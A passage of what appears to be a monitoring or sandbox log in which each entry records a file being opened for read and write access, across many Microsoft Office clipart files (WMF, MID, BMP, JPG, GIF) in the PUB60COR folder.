Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02426_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02431_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02435_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02439_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02441_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02443_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02444_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02448_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02450_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02451_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02453_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NBOOK_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\OCEAN_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\OUTDR_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PAPER_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_02.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_04.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_05.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_06.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_07.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_08.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_09.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_10.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00013_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00014_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00034_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00049_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00050_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00052_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00231_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00272_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00468_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00478_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00485_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00489_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00531_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00542_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00559_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00563_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00633_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00640_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00668_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00685_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00686_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00693_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00720_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00723_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00726_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00737_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00833_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00898_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00934_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00998_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01160_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01172_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01191_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01661_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01797_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02120_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02169_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02262_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02263_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02265_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02267_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02270_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02278_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02280_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02282_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02285_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02287_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02288_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02293_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02296_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02369_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02522_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02950_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02957_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03236_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03241_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03257_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03339_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03451_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03453_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03459_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03464_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03466_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03470_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03513_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03668_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03731_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03795_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE04050_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05665_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05710_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05869_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05870_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05930_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE06049_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE06450_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH00601G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01255G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02736G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02740G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02743G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02746G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
